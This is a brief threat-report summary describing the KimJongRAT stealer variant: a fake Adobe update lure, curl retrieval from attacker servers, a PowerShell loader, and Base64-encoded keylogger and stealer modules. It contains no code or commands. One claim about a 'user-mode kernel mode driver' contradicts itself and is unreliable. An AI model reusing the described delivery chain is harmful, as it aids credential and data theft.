Exploring a New KimJongRAT Stealer Variant and Its PowerShell Implementation

Threat actors have deployed a multi-stage Windows malware loader and information-stealing agent called KimJongRAT, targeting individuals in South Korea with fake Adobe software updates.
Once executed, the malware retrieves additional components from attacker-controlled servers using the Windows tool curl.
It then decrypts and loads these components using a custom loader written in PowerShell.
The malware has two main components, a downloader and a stealer, which are loaded and executed from files 2.log and 1.log, respectively.
The keylogger and stealer modules are encoded as Base64 text in a separate file (1.log) that the downloader script reads and decodes.
These modules collect and upload system information and browser data to the attacker’s server.
The attackers likely use this information to target additional attacks against the victim’s colleagues and friends.
This malware has a user-mode kernel mode driver component, which means it requests high privileges during execution.
We recommend users refrain from opening unsolicited Adobe software update alerts and verify them against legitimate Adobe websites.

Fast Feed